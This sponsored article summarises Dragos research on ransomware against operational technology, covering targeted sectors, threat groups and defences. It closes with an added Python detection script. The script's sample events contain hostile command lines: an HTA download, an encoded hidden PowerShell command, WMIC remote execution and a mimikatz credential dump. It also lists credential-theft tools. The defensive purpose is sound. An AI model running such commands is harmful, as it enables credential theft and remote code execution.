The increasing impact of ransomware on operational technology

Dragos research has found a surge in ransomware attacks on operational technology, disproving the assumption that such threats only affect IT

Operational technology — the hardware and software that directly monitors and controls physical equipment and processes — is a critical part of day-to-day life. Responsible for monitoring and controlling critical infrastructure and manufacturing operations, OT is found across an array of mission-critical sectors, such as utilities, oil and gas and transport.

However, such infrastructure has been in the headlines in recent times for coming under attack by ransomware, notable examples being meat processor JBS and fuel supplier Colonial Pipeline. Threat actors are no longer targeting only IT, but also the technology behind industrial processes, resulting in widespread disruption as well as financial and reputational losses.

According to research conducted by cyber security experts Dragos, industrial infrastructure across Europe is being targeted for geopolitical or financial reasons. Of the industries observed by Dragos, the most frequently targeted were:

  • Manufacturing (61 per cent);
  • Transportation (15 per cent);
  • Water (9 per cent);
  • Energy (8 per cent).

With this in mind, we delve deeper into Dragos’s findings to explore the impact of ransomware on operational technology.

The impacts of ransomware on OT

Ransomware threat actors are constantly evolving their tactics, scaling up attacks, raising the stakes and gathering more intelligence on exploitable vulnerabilities. Due to the crucial and sensitive nature of infrastructure operations, victim organisations find themselves between a rock and a hard place: pay the ransom (which experts generally advise against) or shut operations down, putting critical supplies on hold.

According to Dragos, the impact on OT manifests itself in four ways:

  1. Pre-emptive shutdown of operations to stop ransomware spreading into OT, which protects the technology from long-term damage at the cost of halting production (as seen with the Colonial Pipeline attack).
  2. Rapid spread of ransomware from IT into OT due to flat networks and a lack of visibility.
  3. Six ransomware strains contain built-in OT process kill lists (lists of industrial software processes and services the malware terminates before encrypting files): Cl0p, EKANS, LockerGoga, Maze, MegaCortex and Nefilim.
  4. Attacks that target only enterprise IT can still lead to OT documentation being leaked on underground forums if the ransom isn't paid, enabling follow-on attacks on OT.

Major activity groups

Dragos has identified an array of prominent activity groups targeting European industrial infrastructure in recent times. The most active groups being monitored include:

  • ALLANITE: The ALLANITE group targets the enterprise and OT networks of electric utilities in the UK and US, as well as industrial infrastructure in Germany. The group continually surveys OT environments for vulnerabilities.
  • DYMALLOY: Victims of DYMALLOY include electric and oil and gas providers based in Europe, North America and Turkey. According to Dragos, the group is capable of long-term, persistent intelligence collection and of future disruption events.
  • ELECTRUM: Found to be behind the 2016 CRASHOVERRIDE event in Ukraine, ELECTRUM can develop malware that uses OT protocols and communications to manipulate the operation of electric grid equipment.
  • MAGNALLIUM: Starting in Saudi Arabia, where it targeted aviation and oil and gas companies, MAGNALLIUM expanded to Europe and North America in 2020, with a possible emphasis on semiconductor manufacturing and government bodies. Malicious samples attributed to the group were delivered as Hypertext Markup Language (HTML) files.
  • PARASITE: Targeting aerospace, oil and gas and utilities firms, this group exploits VPN vulnerabilities and uses open source tools against victim infrastructure. According to Dragos, PARASITE has been active since 2017.
  • XENOTIME: Starting in the Middle East, XENOTIME began expanding into Europe in 2018, targeting oil and gas companies. Dragos assesses with moderate confidence that the group is capable of compromising oil and gas operations in the North Sea.

Going forward, Dragos will continue to track these groups, which are expected to keep evolving to evade security measures.

Keeping OT protected

To keep operational technology protected against ransomware attacks going forward, Dragos recommends taking appropriate measures in three areas: initial intrusion defence, network access defence and host-based defence. A strategy that covers all three, backed by constant vigilance, is vital to keeping ransomware threat actors at bay.

Initial intrusion

To protect against initial intrusion, organisations must consistently find and remediate key vulnerabilities, prioritising those with known exploits, while monitoring the network for attack attempts. Wherever possible, equipment should be kept up to date.

VPNs in particular need close attention from cyber security personnel: VPN keys and certificates should be regenerated, and logging of VPN activity enabled. VPN access into OT environments calls for architecture reviews, multi-factor authentication (MFA) and jump hosts.

In addition, users should read email in plain text rather than rendering HTML, and Microsoft Office macros should be disabled; both measures cut off common delivery routes for the HTML and macro-based payloads used in initial access.

Network access

To counter network access attempts by threat actors, organisations should perform an architecture review of the routing protocols and paths that touch OT, and monitor for the use of open source tools of the kind favoured by groups such as PARASITE.

MFA should be required for access to OT systems, and threat intelligence sources used to identify and track threat actors and their command-and-control communications.

Host-based threats

For host-based ransomware threats, potentially malicious PowerShell, Windows Management Instrumentation (WMI) and Python activity should be monitored, as should malicious HTA (HTML Application) payloads that lead to PowerShell execution.

Security teams should also watch for possible use of credential-stealing tools; unusual enumeration and use of built-in system tools; and new services and scheduled tasks appearing on hosts.
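As an added illustration of the host-based monitoring described in the two paragraphs above (example code written for this summary, not Dragos's tooling or anything from the report), the following Python script runs a handful of simple detection rules over constructed Windows event records modelled on Sysmon process-creation (Event ID 1), service-installation (System 7045) and scheduled-task-creation (Security 4698) events. The hostnames, file paths, service names and command lines are invented for the example, and the event fields are a simplified subset of what the real logs carry.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry). Fields are a simplified
# subset of Sysmon Event ID 1 (process create), System 7045 (service
# installed) and Security 4698 (scheduled task created). Hostnames, paths
# and command lines are invented for the example.
SAMPLE_EVENTS = [
    {"id": 1, "host": "hmi-01",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "mshta.exe http://203.0.113.7/update.hta"},
    {"id": 1, "host": "hmi-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"id": 1, "host": "eng-ws-02",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'wmic /node:plc-gw-01 process call create "cmd.exe /c whoami"'},
    {"id": 1, "host": "eng-ws-02",
     "image": r"C:\Users\op\Downloads\mimikatz.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'mimikatz.exe "sekurlsa::logonpasswords" exit'},
    {"id": 7045, "host": "historian-01", "service": "PSEXESVC",
     "image_path": r"C:\Windows\PSEXESVC.exe"},
    {"id": 4698, "host": "historian-01",
     "task": r"\Microsoft\Windows\Update\SyncRunner",
     "command": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\run.ps1"},
    {"id": 1, "host": "scada-srv",                     # benign control event
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\docs\notes.txt"},
]

OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
INTERPRETERS = SHELLS | {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRED_TOOLS = ("mimikatz", "lazagne", "pypykatz", "secretsdump")   # matched on image name
REMOTE_EXEC_SERVICES = {"psexesvc", "paexec", "winexesvc"}         # services dropped by remote-exec tools
# PowerShell flags typical of download-and-execute loaders: encoded command,
# hidden window, no profile, execution-policy bypass.
PS_EVASION = re.compile(
    r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b"
    r"|-ep\s+bypass|executionpolicy\s+bypass", re.I)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Apply the detection rules to each event; return every match."""
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["id"] == 1:
            image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
            if image in INTERPRETERS and parent in OFFICE_APPS:
                findings.append(Finding(host, "office_spawns_interpreter", f"{parent} -> {image}"))
            if image in SHELLS and parent == "mshta.exe":
                findings.append(Finding(host, "hta_to_powershell", cmd))
            if image in SHELLS and PS_EVASION.search(cmd):
                findings.append(Finding(host, "powershell_evasion_flags", cmd))
            if image == "wmic.exe" and re.search(r"/node:\S+.*\bprocess\b", cmd, re.I):
                findings.append(Finding(host, "wmi_remote_exec", cmd))
            if any(t in image for t in CRED_TOOLS) or (image == "procdump.exe" and "lsass" in cmd.lower()):
                findings.append(Finding(host, "credential_theft_tool", image))
        elif ev["id"] == 7045:
            rule = "remote_exec_service" if ev["service"].lower() in REMOTE_EXEC_SERVICES else "new_service"
            findings.append(Finding(host, rule, f"{ev['service']} ({ev['image_path']})"))
        elif ev["id"] == 4698:
            if any(i in ev["command"].lower() for i in INTERPRETERS):
                findings.append(Finding(host, "scheduled_task_runs_interpreter", ev["task"]))
    return findings


def hosts_needing_triage(events):
    """Distinct hosts with at least one finding, for the responder's queue."""
    return sorted({f.host for f in analyse(events)})


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.host:14} {f.rule:32} {f.detail}")
```

Every new service or scheduled task is reported, not just the suspicious ones, because on an OT host the baseline should be quiet enough that each addition deserves a look; the rules then sharpen that into the specific chains the text calls out, such as an HTA payload spawning an encoded PowerShell command. In production these records would come from a log pipeline rather than an inline list, and the tool names would be tuned to the site's own baseline.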

For more information on Dragos's research into ransomware's impact on operational infrastructure, download the Dragos European Industrial Infrastructure Cyber Threat Perspective report.

This article was written as part of a content campaign with Dragos.
